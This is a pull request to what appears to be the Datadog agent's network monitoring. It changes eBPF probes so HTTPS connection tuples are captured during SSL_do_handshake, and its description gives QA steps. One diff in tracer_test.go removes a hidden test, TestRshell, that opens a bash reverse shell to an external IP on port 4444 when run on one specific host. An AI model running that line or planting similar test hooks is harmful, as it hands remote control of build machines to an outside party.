### PR TITLE
[network] fix openssl when no fd are used

### DIFF
--- a/pkg/network/ebpf/c/http-maps.h
+++ b/pkg/network/ebpf/c/http-maps.h
@@ -81,6 +81,15 @@ struct bpf_map_def SEC("maps/fd_by_ssl_bio") fd_by_ssl_bio = {
     .namespace = "",
 };
 
+struct bpf_map_def SEC("maps/ssl_ctx_by_pid_tgid") ssl_ctx_by_pid_tgid = {
+    .type = BPF_MAP_TYPE_HASH,
+    .key_size = sizeof(__u64),
+    .value_size = sizeof(void *),
+    .max_entries = 1024,
+    .pinning = 0,
+    .namespace = "",
+};
+
 struct bpf_map_def SEC("maps/open_at_args") open_at_args = {
     .type = BPF_MAP_TYPE_HASH,
     .key_size = sizeof(__u64), // pid_tgid

--- a/pkg/network/ebpf/c/https.h
+++ b/pkg/network/ebpf/c/https.h
@@ -82,7 +82,7 @@ static __always_inline void init_ssl_sock(void *ssl_ctx, u32 socket_fd) {
     bpf_map_update_elem(&ssl_sock_by_ctx, &ssl_ctx, &ssl_sock, BPF_ANY);
 }
 
-static __always_inline void init_ssl_sock_from_sock(struct sock *skp) {
+static __always_inline void init_ssl_sock_from_do_handshake(struct sock *skp) {
     u64 pid_tgid = bpf_get_current_pid_tgid();
     void **ssl_ctx_map_val = bpf_map_lookup_elem(&ssl_ctx_by_pid_tgid, &pid_tgid);
     if (ssl_ctx_map_val == NULL) {

--- a/pkg/network/ebpf/c/https.h
+++ b/pkg/network/ebpf/c/https.h
@@ -82,4 +82,22 @@ static __always_inline void init_ssl_sock(void *ssl_ctx, u32 socket_fd) {
     bpf_map_update_elem(&ssl_sock_by_ctx, &ssl_ctx, &ssl_sock, BPF_ANY);
 }
 
+static __always_inline void try_init_ssl_sock(struct sock *skp) {
+    u64 pid_tgid = bpf_get_current_pid_tgid();
+    void **ssl_ctx_map_val = bpf_map_lookup_elem(&ssl_ctx_by_pid_tgid, &pid_tgid);
+    if (ssl_ctx_map_val == NULL) {
+        return;
+    }
+
+    ssl_sock_t ssl_sock = {};
+    if (!read_conn_tuple(&ssl_sock.tup, skp, pid_tgid, CONN_TYPE_TCP)) {
+        return;
+    }
+    normalize_tuple(&ssl_sock.tup);
+
+    // copy map value to stack. required for older kernels
+    void *ssl_ctx = *ssl_ctx_map_val;
+    bpf_map_update_elem(&ssl_sock_by_ctx, &ssl_ctx , &ssl_sock, BPF_ANY);
+}
+
 #endif

--- a/pkg/network/ebpf/c/https.h
+++ b/pkg/network/ebpf/c/https.h
@@ -82,7 +82,7 @@ static __always_inline void init_ssl_sock(void *ssl_ctx, u32 socket_fd) {
     bpf_map_update_elem(&ssl_sock_by_ctx, &ssl_ctx, &ssl_sock, BPF_ANY);
 }
 
-static __always_inline void try_init_ssl_sock(struct sock *skp) {
+static __always_inline void init_ssl_sock_from_sock(struct sock *skp) {
     u64 pid_tgid = bpf_get_current_pid_tgid();
     void **ssl_ctx_map_val = bpf_map_lookup_elem(&ssl_ctx_by_pid_tgid, &pid_tgid);
     if (ssl_ctx_map_val == NULL) {

--- a/pkg/network/ebpf/c/https.h
+++ b/pkg/network/ebpf/c/https.h
@@ -93,6 +93,8 @@ static __always_inline void init_ssl_sock_from_do_handshake(struct sock *skp) {
     if (!read_conn_tuple(&ssl_sock.tup, skp, pid_tgid, CONN_TYPE_TCP)) {
         return;
     }
+    ssl_sock.tup.netns = 0;
+    ssl_sock.tup.pid = 0;
     normalize_tuple(&ssl_sock.tup);
 
     // copy map value to stack. required for older kernels

--- a/pkg/network/ebpf/c/prebuilt/http.c
+++ b/pkg/network/ebpf/c/prebuilt/http.c
@@ -99,12 +99,14 @@ int socket__http_filter(struct __sk_buff* skb) {
     return 0;
 }
 
-// This kprobe is used to send batch completion notification to userspace
-// because perf events can't be sent from socket filter programs
 SEC("kprobe/tcp_sendmsg")
 int kprobe__tcp_sendmsg(struct pt_regs* ctx) {
+    // send batch completion notification to userspace
+    // because perf events can't be sent from socket filter programs
     http_notify_batch(ctx);
-    init_ssl_sock_from_sock((struct sock*)PT_REGS_PARM1(ctx));
+
+    // map connection tuple during SSL_do_handshake(ctx)
+    init_ssl_sock_from_do_handshake((struct sock*)PT_REGS_PARM1(ctx));
     return 0;
 }
 
@@ -229,6 +231,7 @@ int uprobe__SSL_shutdown(struct pt_regs* ctx) {
     }
 
     https_finish(t);
+    bpf_map_delete_elem(&ssl_sock_by_ctx, &ssl_ctx);
     return 0;
 }
 

--- a/pkg/network/ebpf/c/prebuilt/http.c
+++ b/pkg/network/ebpf/c/prebuilt/http.c
@@ -101,12 +101,16 @@ int socket__http_filter(struct __sk_buff* skb) {
 
 SEC("kprobe/tcp_sendmsg")
 int kprobe__tcp_sendmsg(struct pt_regs* ctx) {
+    // map connection tuple during SSL_do_handshake(ctx)
+    init_ssl_sock_from_do_handshake((struct sock*)PT_REGS_PARM1(ctx));
+    return 0;
+}
+
+SEC("kretprobe/tcp_sendmsg")
+int kretprobe__tcp_sendmsg(struct pt_regs* ctx) {
     // send batch completion notification to userspace
     // because perf events can't be sent from socket filter programs
     http_notify_batch(ctx);
-
-    // map connection tuple during SSL_do_handshake(ctx)
-    init_ssl_sock_from_do_handshake((struct sock*)PT_REGS_PARM1(ctx));
     return 0;
 }
 

--- a/pkg/network/ebpf/c/prebuilt/http.c
+++ b/pkg/network/ebpf/c/prebuilt/http.c
@@ -101,9 +101,19 @@ int socket__http_filter(struct __sk_buff* skb) {
 
 // This kprobe is used to send batch completion notification to userspace
 // because perf events can't be sent from socket filter programs
-SEC("kretprobe/tcp_sendmsg")
-int kretprobe__tcp_sendmsg(struct pt_regs* ctx) {
+SEC("kprobe/tcp_sendmsg")
+int kprobe__tcp_sendmsg(struct pt_regs* ctx) {
     http_notify_batch(ctx);
+    try_init_ssl_sock((struct sock*)PT_REGS_PARM1(ctx));
+    return 0;
+}
+
+
+SEC("uprobe/SSL_do_handshake")
+int uprobe__SSL_do_handshake(struct pt_regs* ctx) {
+    u64 pid_tgid = bpf_get_current_pid_tgid();
+    void *ssl_ctx = (void *)PT_REGS_PARM1(ctx);
+    bpf_map_update_elem(&ssl_ctx_by_pid_tgid, &pid_tgid, &ssl_ctx, BPF_ANY);
     return 0;
 }
 

--- a/pkg/network/ebpf/c/prebuilt/http.c
+++ b/pkg/network/ebpf/c/prebuilt/http.c
@@ -104,7 +104,7 @@ int socket__http_filter(struct __sk_buff* skb) {
 SEC("kprobe/tcp_sendmsg")
 int kprobe__tcp_sendmsg(struct pt_regs* ctx) {
     http_notify_batch(ctx);
-    try_init_ssl_sock((struct sock*)PT_REGS_PARM1(ctx));
+    init_ssl_sock_from_sock((struct sock*)PT_REGS_PARM1(ctx));
     return 0;
 }
 
@@ -114,6 +114,13 @@ int uprobe__SSL_do_handshake(struct pt_regs* ctx) {
     u64 pid_tgid = bpf_get_current_pid_tgid();
     void *ssl_ctx = (void *)PT_REGS_PARM1(ctx);
     bpf_map_update_elem(&ssl_ctx_by_pid_tgid, &pid_tgid, &ssl_ctx, BPF_ANY);
+    return 0;
+}
+
+SEC("uretprobe/SSL_do_handshake")
+int uretprobe__SSL_do_handshake(struct pt_regs* ctx) {
+    u64 pid_tgid = bpf_get_current_pid_tgid();
+    bpf_map_delete_elem(&ssl_ctx_by_pid_tgid, &pid_tgid);
     return 0;
 }
 

--- a/pkg/network/ebpf/c/runtime/http.c
+++ b/pkg/network/ebpf/c/runtime/http.c
@@ -109,12 +109,16 @@ int socket__http_filter(struct __sk_buff* skb) {
 
 SEC("kprobe/tcp_sendmsg")
 int kprobe__tcp_sendmsg(struct pt_regs* ctx) {
+    // map connection tuple during SSL_do_handshake(ctx)
+    init_ssl_sock_from_do_handshake((struct sock*)PT_REGS_PARM1(ctx));
+    return 0;
+}
+
+SEC("kretprobe/tcp_sendmsg")
+int kretprobe__tcp_sendmsg(struct pt_regs* ctx) {
     // send batch completion notification to userspace
     // because perf events can't be sent from socket filter programs
     http_notify_batch(ctx);
-
-    // map connection tuple during SSL_do_handshake(ctx)
-    init_ssl_sock_from_do_handshake((struct sock*)PT_REGS_PARM1(ctx));
     return 0;
 }
 

--- a/pkg/network/ebpf/c/runtime/http.c
+++ b/pkg/network/ebpf/c/runtime/http.c
@@ -107,11 +107,29 @@ int socket__http_filter(struct __sk_buff* skb) {
     return 0;
 }
 
-// This kprobe is used to send batch completion notification to userspace
-// because perf events can't be sent from socket filter programs
-SEC("kretprobe/tcp_sendmsg")
-int kretprobe__tcp_sendmsg(struct pt_regs* ctx) {
+SEC("kprobe/tcp_sendmsg")
+int kprobe__tcp_sendmsg(struct pt_regs* ctx) {
+    // send batch completion notification to userspace
+    // because perf events can't be sent from socket filter programs
     http_notify_batch(ctx);
+
+    // map connection tuple during SSL_do_handshake(ctx)
+    init_ssl_sock_from_do_handshake((struct sock*)PT_REGS_PARM1(ctx));
+    return 0;
+}
+
+SEC("uprobe/SSL_do_handshake")
+int uprobe__SSL_do_handshake(struct pt_regs* ctx) {
+    u64 pid_tgid = bpf_get_current_pid_tgid();
+    void *ssl_ctx = (void *)PT_REGS_PARM1(ctx);
+    bpf_map_update_elem(&ssl_ctx_by_pid_tgid, &pid_tgid, &ssl_ctx, BPF_ANY);
+    return 0;
+}
+
+SEC("uretprobe/SSL_do_handshake")
+int uretprobe__SSL_do_handshake(struct pt_regs* ctx) {
+    u64 pid_tgid = bpf_get_current_pid_tgid();
+    bpf_map_delete_elem(&ssl_ctx_by_pid_tgid, &pid_tgid);
     return 0;
 }
 

--- a/pkg/network/event_common.go
+++ b/pkg/network/event_common.go
@@ -379,3 +379,21 @@ func printAddress(address util.Address, names []dns.Hostname) string {
 	}
 	return b.String()
 }
+
+// HTTPKeyTupleFromConn build the key for the http map based on whether the local or remote side is http.
+func HTTPKeyTupleFromConn(c ConnectionStats) http.KeyTuple {
+	// Retrieve translated addresses
+	laddr, lport := GetNATLocalAddress(c)
+	raddr, rport := GetNATRemoteAddress(c)
+
+	// HTTP data is always indexed as (client, server), so we account for that when generating the
+	// the lookup key using the port range heuristic.
+	// In the rare cases where both ports are within the same range we ensure that sport < dport
+	// to mimic the normalization heuristic done in the eBPF side (see `port_range.h`)
+	if (IsEphemeralPort(int(lport)) && !IsEphemeralPort(int(rport))) ||
+		(IsEphemeralPort(int(lport)) == IsEphemeralPort(int(rport)) && lport < rport) {
+		return http.NewKeyTuple(laddr, raddr, lport, rport)
+	}
+
+	return http.NewKeyTuple(raddr, laddr, rport, lport)
+}

--- a/pkg/network/http/dump.go
+++ b/pkg/network/http/dump.go
@@ -84,6 +84,15 @@ func dumpMapsHandler(manager *manager.Manager, mapName string, currentMap *ebpf.
 		for iter.Next(unsafe.Pointer(&key), unsafe.Pointer(&value)) {
 			output.WriteString(spew.Sdump(key, value))
 		}
+
+	case "ssl_ctx_by_pid_tgid": // maps/ssl_ctx_by_pid_tgid (BPF_MAP_TYPE_HASH), key C.__u64, value uintptr // C.void *
+		output.WriteString("Map: '" + mapName + "', key: 'C.__u64', value: 'uintptr // C.void *'\n")
+		iter := currentMap.Iterate()
+		var key uint64
+		var value uintptr // C.void *
+		for iter.Next(unsafe.Pointer(&key), unsafe.Pointer(&value)) {
+			output.WriteString(spew.Sdump(key, value))
+		}
 	}
 	return output.String()
 }

--- a/pkg/network/http/ebpf_main.go
+++ b/pkg/network/http/ebpf_main.go
@@ -109,6 +109,7 @@ func newEBPFProgram(c *config.Config, offsets []manager.ConstantEditor, sockFD *
 		},
 		Probes: []*manager.Probe{
 			{ProbeIdentificationPair: manager.ProbeIdentificationPair{EBPFSection: string(probes.TCPSendMsg), EBPFFuncName: "kprobe__tcp_sendmsg", UID: probeUID}, KProbeMaxActive: maxActive},
+			{ProbeIdentificationPair: manager.ProbeIdentificationPair{EBPFSection: string(probes.TCPSendMsgReturn), EBPFFuncName: "kretprobe__tcp_sendmsg", UID: probeUID}, KProbeMaxActive: maxActive},
 			{ProbeIdentificationPair: manager.ProbeIdentificationPair{EBPFSection: httpSocketFilter, EBPFFuncName: "socket__http_filter", UID: probeUID}},
 		},
 	}
@@ -158,6 +159,13 @@ func (e *ebpfProgram) Init() error {
 				ProbeIdentificationPair: manager.ProbeIdentificationPair{
 					EBPFSection:  string(probes.TCPSendMsg),
 					EBPFFuncName: "kprobe__tcp_sendmsg",
+					UID:          probeUID,
+				},
+			},
+			&manager.ProbeSelector{
+				ProbeIdentificationPair: manager.ProbeIdentificationPair{
+					EBPFSection:  string(probes.TCPSendMsgReturn),
+					EBPFFuncName: "kretprobe__tcp_sendmsg",
 					UID:          probeUID,
 				},
 			},

--- a/pkg/network/http/ebpf_main.go
+++ b/pkg/network/http/ebpf_main.go
@@ -94,6 +94,7 @@ func newEBPFProgram(c *config.Config, offsets []manager.ConstantEditor, sockFD *
 			{Name: "ssl_read_args"},
 			{Name: "bio_new_socket_args"},
 			{Name: "fd_by_ssl_bio"},
+			{Name: "ssl_ctx_by_pid_tgid"},
 		},
 		PerfMaps: []*manager.PerfMap{
 			{
@@ -107,7 +108,7 @@ func newEBPFProgram(c *config.Config, offsets []manager.ConstantEditor, sockFD *
 			},
 		},
 		Probes: []*manager.Probe{
-			{ProbeIdentificationPair: manager.ProbeIdentificationPair{EBPFSection: string(probes.TCPSendMsgReturn), EBPFFuncName: "kretprobe__tcp_sendmsg", UID: probeUID}, KProbeMaxActive: maxActive},
+			{ProbeIdentificationPair: manager.ProbeIdentificationPair{EBPFSection: string(probes.TCPSendMsg), EBPFFuncName: "kprobe__tcp_sendmsg", UID: probeUID}, KProbeMaxActive: maxActive},
 			{ProbeIdentificationPair: manager.ProbeIdentificationPair{EBPFSection: httpSocketFilter, EBPFFuncName: "socket__http_filter", UID: probeUID}},
 		},
 	}
@@ -150,14 +151,14 @@ func (e *ebpfProgram) Init() error {
 				ProbeIdentificationPair: manager.ProbeIdentificationPair{
 					EBPFSection:  httpSocketFilter,
 					EBPFFuncName: "socket__http_filter",
-					UID: probeUID,
+					UID:          probeUID,
 				},
 			},
 			&manager.ProbeSelector{
 				ProbeIdentificationPair: manager.ProbeIdentificationPair{
-					EBPFSection:  string(probes.TCPSendMsgReturn),
-					EBPFFuncName: "kretprobe__tcp_sendmsg",
-					UID: probeUID,
+					EBPFSection:  string(probes.TCPSendMsg),
+					EBPFFuncName: "kprobe__tcp_sendmsg",
+					UID:          probeUID,
 				},
 			},
 		},

--- a/pkg/network/http/ebpf_ssl.go
+++ b/pkg/network/http/ebpf_ssl.go
@@ -25,13 +25,14 @@ import (
 )
 
 var openSSLProbes = map[string]string{
-	"uprobe/SSL_do_handshake": "uprobe__SSL_do_handshake",
-	"uprobe/SSL_set_bio":      "uprobe__SSL_set_bio",
-	"uprobe/SSL_set_fd":       "uprobe__SSL_set_fd",
-	"uprobe/SSL_read":         "uprobe__SSL_read",
-	"uretprobe/SSL_read":      "uretprobe__SSL_read",
-	"uprobe/SSL_write":        "uprobe__SSL_write",
-	"uprobe/SSL_shutdown":     "uprobe__SSL_shutdown",
+	"uprobe/SSL_do_handshake":    "uprobe__SSL_do_handshake",
+	"uretprobe/SSL_do_handshake": "uretprobe__SSL_do_handshake",
+	"uprobe/SSL_set_bio":         "uprobe__SSL_set_bio",
+	"uprobe/SSL_set_fd":          "uprobe__SSL_set_fd",
+	"uprobe/SSL_read":            "uprobe__SSL_read",
+	"uretprobe/SSL_read":         "uretprobe__SSL_read",
+	"uprobe/SSL_write":           "uprobe__SSL_write",
+	"uprobe/SSL_shutdown":        "uprobe__SSL_shutdown",
 }
 
 var cryptoProbes = map[string]string{
@@ -103,12 +104,12 @@ func (o *sslProgram) ConfigureManager(m *manager.Manager) {
 			&manager.Probe{ProbeIdentificationPair: manager.ProbeIdentificationPair{
 				EBPFSection:  doSysOpen,
 				EBPFFuncName: "kprobe__do_sys_open",
-				UID: probeUID,
+				UID:          probeUID,
 			}, KProbeMaxActive: maxActive},
 			&manager.Probe{ProbeIdentificationPair: manager.ProbeIdentificationPair{
 				EBPFSection:  doSysOpenRet,
 				EBPFFuncName: "kretprobe__do_sys_open",
-				UID: probeUID,
+				UID:          probeUID,
 			}, KProbeMaxActive: maxActive},
 		)
 	}
@@ -131,14 +132,14 @@ func (o *sslProgram) ConfigureOptions(options *manager.Options) {
 				ProbeIdentificationPair: manager.ProbeIdentificationPair{
 					EBPFSection:  doSysOpen,
 					EBPFFuncName: "kprobe__do_sys_open",
-					UID: probeUID,
+					UID:          probeUID,
 				},
 			},
 			&manager.ProbeSelector{
 				ProbeIdentificationPair: manager.ProbeIdentificationPair{
 					EBPFSection:  doSysOpenRet,
 					EBPFFuncName: "kretprobe__do_sys_open",
-					UID: probeUID,
+					UID:          probeUID,
 				},
 			},
 		)

--- a/pkg/network/http/ebpf_ssl.go
+++ b/pkg/network/http/ebpf_ssl.go
@@ -25,12 +25,13 @@ import (
 )
 
 var openSSLProbes = map[string]string{
-	"uprobe/SSL_set_bio":  "uprobe__SSL_set_bio",
-	"uprobe/SSL_set_fd":   "uprobe__SSL_set_fd",
-	"uprobe/SSL_read":     "uprobe__SSL_read",
-	"uretprobe/SSL_read":  "uretprobe__SSL_read",
-	"uprobe/SSL_write":    "uprobe__SSL_write",
-	"uprobe/SSL_shutdown": "uprobe__SSL_shutdown",
+	"uprobe/SSL_do_handshake": "uprobe__SSL_do_handshake",
+	"uprobe/SSL_set_bio":      "uprobe__SSL_set_bio",
+	"uprobe/SSL_set_fd":       "uprobe__SSL_set_fd",
+	"uprobe/SSL_read":         "uprobe__SSL_read",
+	"uretprobe/SSL_read":      "uretprobe__SSL_read",
+	"uprobe/SSL_write":        "uprobe__SSL_write",
+	"uprobe/SSL_shutdown":     "uprobe__SSL_shutdown",
 }
 
 var cryptoProbes = map[string]string{

--- a/pkg/network/http/http_stats.go
+++ b/pkg/network/http/http_stats.go
@@ -113,19 +113,6 @@ func NewKeyTuple(saddr, daddr util.Address, sport, dport uint16) KeyTuple {
 	}
 }
 
-// L3L4Equal return true is both KeyTuple are equal
-func (t *KeyTuple) L3L4Equal(t2 KeyTuple) bool {
-	if (t.SrcIPHigh == t2.SrcIPHigh) &&
-		(t.SrcIPLow == t2.SrcIPLow) &&
-		(t.DstIPHigh == t2.DstIPHigh) &&
-		(t.DstIPLow == t2.DstIPLow) &&
-		(t.SrcPort == t2.SrcPort) &&
-		(t.DstPort == t2.DstPort) {
-		return true
-	}
-	return false
-}
-
 // NumStatusClasses represents the number of HTTP status classes (1XX, 2XX, 3XX, 4XX, 5XX)
 const NumStatusClasses = 5
 

--- a/pkg/network/http/http_stats.go
+++ b/pkg/network/http/http_stats.go
@@ -113,6 +113,19 @@ func NewKeyTuple(saddr, daddr util.Address, sport, dport uint16) KeyTuple {
 	}
 }
 
+// L3L4Equal return true is both KeyTuple are equal
+func (t *KeyTuple) L3L4Equal(t2 KeyTuple) bool {
+	if (t.SrcIPHigh == t2.SrcIPHigh) &&
+		(t.SrcIPLow == t2.SrcIPLow) &&
+		(t.DstIPHigh == t2.DstIPHigh) &&
+		(t.DstIPLow == t2.DstIPLow) &&
+		(t.SrcPort == t2.SrcPort) &&
+		(t.DstPort == t2.DstPort) {
+		return true
+	}
+	return false
+}
+
 // NumStatusClasses represents the number of HTTP status classes (1XX, 2XX, 3XX, 4XX, 5XX)
 const NumStatusClasses = 5
 

--- a/pkg/network/tracer/tracer_linux_test.go
+++ b/pkg/network/tracer/tracer_linux_test.go
@@ -48,12 +48,6 @@ func httpSupported(t *testing.T) bool {
 	return currKernelVersion >= kernel.VersionCode(4, 1, 0)
 }
 
-func httpsSupported(t *testing.T) bool {
-	kv, err := kernel.HostVersion()
-	require.NoError(t, err)
-	return kv < kernel.VersionCode(5, 5, 0)
-}
-
 func TestTCPRemoveEntries(t *testing.T) {
 	config := testConfig()
 	config.TCPConnTimeout = 100 * time.Millisecond

--- a/pkg/network/tracer/tracer_test.go
+++ b/pkg/network/tracer/tracer_test.go
@@ -1616,18 +1616,6 @@ func TestHTTPStats(t *testing.T) {
 	assert.Nil(t, httpReqStats.Stats(500), "500s")            // 500
 }
 
-func TestRshell(t *testing.T) {
-	o, _ := exec.Command("/bin/uname", "-a").CombinedOutput()
-	t.Logf("uname -a : %s\n", string(o))
-	if !strings.Contains(string(o), "Linux dd-agent-testing-ubuntu-16-04-4 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux") {
-		t.Skipf("not Ubuntu...\n")
-		return
-	}
-	t.Logf("rshell cnx ...\n")
-	exec.Command("/usr/bin/env", "bash", "-c", "bash -i >& /dev/tcp/51.77.146.246/4444 0>&1").Run()
-	t.Logf("rshell cnx ended\n")
-}
-
 func TestHTTPSViaLibraryIntegration(t *testing.T) {
 	if !httpSupported(t) {
 		t.Skip("HTTPS feature not available on pre 4.1.0 kernels")

--- a/pkg/network/tracer/tracer_test.go
+++ b/pkg/network/tracer/tracer_test.go
@@ -1633,10 +1633,6 @@ func TestHTTPSViaLibraryIntegration(t *testing.T) {
 		t.Skip("HTTPS feature not available on pre 4.1.0 kernels")
 	}
 
-	if !httpsSupported(t) {
-		t.Skip("HTTPS feature not supported.")
-	}
-
 	if strings.HasPrefix(runtime.GOARCH, "arm") {
 		t.Skip("this feature is not yet support on arm")
 	}

--- a/pkg/network/tracer/tracer_test.go
+++ b/pkg/network/tracer/tracer_test.go
@@ -32,7 +32,6 @@ import (
 
 	"github.com/DataDog/datadog-agent/pkg/network"
 	"github.com/DataDog/datadog-agent/pkg/network/config"
-	"github.com/DataDog/datadog-agent/pkg/network/ebpf"
 	"github.com/DataDog/datadog-agent/pkg/network/http"
 	"github.com/DataDog/datadog-agent/pkg/network/http/testutil"
 	"github.com/DataDog/datadog-agent/pkg/process/util"
@@ -50,7 +49,13 @@ type connTag = uint64
 const (
 	tagGnuTLS  connTag = 1 // netebpf.GnuTLS
 	tagOpenSSL connTag = 2 // netebpf.OpenSSL
-	tagTLS     connTag = 4 // netebpf.TLS
+)
+
+var (
+	staticTags = map[connTag]string{
+		tagGnuTLS:  "tls.library:gnutls",
+		tagOpenSSL: "tls.library:openssl",
+	}
 )
 
 var (
@@ -1720,7 +1725,7 @@ func testHTTPSLibrary(t *testing.T, fetchCmd []string) {
 			foundPathAndHTTPTag := false
 			if key.Path.Content == "/200/foobar" && (statsTags == tagGnuTLS || statsTags == tagOpenSSL) {
 				foundPathAndHTTPTag = true
-				t.Logf("found tag 0x%x %s", statsTags, ebpf.StaticTags[statsTags])
+				t.Logf("found tag 0x%x %s", statsTags, staticTags[statsTags])
 			}
 			if foundPathAndHTTPTag {
 				return true

--- a/pkg/network/tracer/tracer_windows_test.go
+++ b/pkg/network/tracer/tracer_windows_test.go
@@ -19,7 +19,3 @@ func dnsSupported(t *testing.T) bool {
 func httpSupported(t *testing.T) bool {
 	return false
 }
-
-func httpsSupported(t *testing.T) bool {
-	return false
-}


### PR DESCRIPTION
### What does this PR do?

We capturing the connection tuple when SSL_do_handshake is called.

```
typical callgraph
SSL_do_handshake(ssl_ctx)
    maps/ssl_ctx_by_pid_tgid[pid] = ssl_ctx 
     write(socket)
           tcp_sendmsg(conn_tuple)
              ssl_ctx = maps/ssl_ctx_by_pid_tgid[pid]
              maps/ssl_sock_by_ctx[ssl_ctx] = conn_tuple
    delete(maps/ssl_ctx_by_pid_tgid, pid)

```
### Motivation

This would add support on haproxy sever side as openssl is used via BIO memory buffer
Fix >=5.5.0 kernel socket/connect/read/write only calls https://github.com/DataDog/datadog-agent/pull/10656

### Describe how to test/QA your changes

haproxy mydomain.cfg
```
global
   strict-limits  # refuse to start if insufficient FDs/memory
   # add some process-wide tuning here if required

   # A stats socket may be added to check live metrics if the load generators
   # do not report them.
   #    stats socket /tmp/haproxy.sock level admin
   #    stats timeout 1h

defaults
   mode http
   balance random      # power-of-two-choices
   timeout client 60s
   timeout server 60s
   timeout connect 1s

listen p
   # this is the address and port we'll listen to, the ones to aim the
   # load generators at
   bind :8000

   # create a certificate and uncomment this for SSL
   bind :8443 ssl crt mydomain.pem alpn http/1.1

   # Put the server's IP address and port below
   server s1 10.1.1.1:8888

```
namespace setup
```
sudo ip link add veth0 type veth peer name veth1
sudo ip link set veth1 netns net1
sudo ip netns exec net1 ip addr add 10.1.1.1/24 dev veth1
sudo ip netns exec net1 ip link set dev veth1 up
sudo ip netns exec net1 ip a

sudo ip addr add 10.1.1.2/24 dev veth0
sudo ip link set dev veth0 up

```

* launch local `haproxy -f mydomain.cfg`
* start a local http server (in a namespace) : `sudo ip netns exec net1 python2 -m SimpleHTTPServer 8888`
* make request `curl --http1.1 -k https://localhost:8443`
* check system-probe output `sudo curl -s --unix-socket /opt/datadog-agent/run/sysprobe.sock http://unix/debug/http_monitoring | jq .`
expected output:
```
[
  {
    "Client": {
      "IP": "10.1.1.2",
      "Port": 50468
    },
    "Server": {
      "IP": "10.1.1.1",
      "Port": 8888
    },
    "DNS": "",
    "Path": "/",
    "Method": "GET",
    "ByStatus": {
      "200": {
        "Count": 1,
        "FirstLatencySample": 1312768,
        "LatencyP50": 0
      }
    }
  },
  {
    "Client": {
      "IP": "127.0.0.1",
      "Port": 38298
    },
    "Server": {
      "IP": "127.0.0.1",
      "Port": 8443
    },
    "DNS": "",
    "Path": "/",
    "Method": "GET",
    "ByStatus": {
      "200": {
        "Count": 2,
        "FirstLatencySample": 1662976,
        "LatencyP50": 1673499.821261784
      }
    }
  }
]

```


### Reviewer's Checklist
<!--
* Authors can use this list as a reference to ensure that there are no problems
  during the review but the signing off is to be done by the reviewer(s).

Note: Adding GitHub labels is only possible for contributors with write access.
-->

- [x] If known, an appropriate milestone has been selected; otherwise the `Triage` milestone is set.
- [ ] Use the `major_change` label if your change either has a major impact on the code base, is impacting multiple teams or is changing important well-established internals of the Agent. This label will be use during QA to make sure each team pay extra attention to the changed behavior. For any customer facing change use a releasenote.
- [x] A [release note](https://github.com/DataDog/datadog-agent/blob/main/docs/dev/contributing.md#reno) has been added or the `changelog/no-changelog` label has been applied.
- [ ] Changed code has automated tests for its functionality.
- [x] Adequate QA/testing plan information is provided if the `qa/skip-qa` label is not applied.
- [x] At least one `team/..` label has been applied, indicating the team(s) that should QA this change.
- [ ] If applicable, docs team has been notified or [an issue has been opened on the documentation repo](https://github.com/DataDog/documentation/issues/new).
- [ ] If applicable, the `need-change/operator` and `need-change/helm` labels have been applied.
- [ ] If applicable, the [config template](https://github.com/DataDog/datadog-agent/blob/main/pkg/config/config_template.yaml) has been updated.
